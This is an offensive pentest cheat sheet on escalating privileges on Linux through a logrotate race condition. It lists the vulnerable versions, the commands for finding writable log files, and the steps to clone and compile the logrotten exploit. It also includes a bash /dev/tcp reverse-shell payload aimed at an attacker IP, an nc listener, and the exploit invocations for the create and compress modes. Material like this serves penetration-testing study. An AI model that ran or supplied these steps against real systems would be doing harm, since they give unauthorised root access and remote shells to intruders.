PRIMARY CATEGORY → LINUX PRIVESC
Theory
Configuration Files
/etc/logrotate.conf # Main Configuration File
/etc/logrotate.d # Additional Configuration Files
/var/lib/logrotate.statusService Configuration Parameters
| DIRECTIVE | DESCRIPTION |
|---|---|
weekly daily monthly yearly | Specifies the rotational frequency ( e.g. weekly → At most once a week ) |
rotate N | Keeps N rotation before deleting the oldest one |
create | After renaming the given log file, it creates a new empty file with the same name |
compress | Compresses the old rotated logs |
Abuse
Race Condition
Vulnerable Versions → 3.8.6, 3.11.0, 3.15.0 and 3.18.0
Requirements
- Write permissions on the Log Files Path
- LogRotate must run as Root or another privileged user
- LogRotate binary must be vulnerable ( Check versions above )
Enumeration
From the Target 🎯
- LogRotate Version
logrotate -v- Log files for which the current user has write permissions
find / -regextype posix-extended -iregex '.*(\.|_)log' -writable 2> /dev/nullCloning the Github Repository
From the Attacker ⚔️
git clone https://github.com/whotwagner/logrotten logrottenCompiling the Binary
From the Target ( If possible ) 🎯
cd !$ && gcc -o logrotten logrotten.cchmod 700 ./logrottenCreating the Payload
From the Target 🎯
echo 'bash -i &> /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1' > payloadChecking LogRotate Option
Create or Compress
From the Target 🎯
grep -RiP --color -- "^[^#]*(create|compress)" /etc/logrotate.conf /etc/logrotate.d/ 2> /dev/nullSetting a TCP Listener
From the Attacker ⚔️
nc -nlvp <PORT>Running the exploit
From the Target 🎯
- Create
./logrotten -p ./payload /tmp/pwnme.log- Compress
./logrotten -p ./payload -c -s 4 /tmp/pwnme.logResources
Linux Privesc with LogRotate Utility